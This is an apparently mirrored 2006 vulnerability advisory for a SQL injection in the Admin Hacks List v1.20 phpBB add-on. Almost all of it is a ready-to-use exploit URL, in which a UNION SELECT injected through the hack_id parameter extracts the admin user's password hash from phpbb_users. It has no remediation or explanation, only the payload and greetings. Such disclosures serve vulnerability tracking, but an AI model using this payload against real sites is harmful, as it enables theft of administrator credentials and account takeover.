Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15247
HistoryNov 28, 2006 - 12:00 a.m.

Admin Hacks List v1.20 Remote SQL Injection Vulnerability

2006-11-2800:00:00
vulners.com
14

########################################################################

Admin Hacks List v1.20 Remote SQL Injection Vulnerability

Download: http://www.nivisec.com

Found By: the master

########################################################################

exploit:

http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash

Greetz: str0ke , Dr Max Virus

########################################################################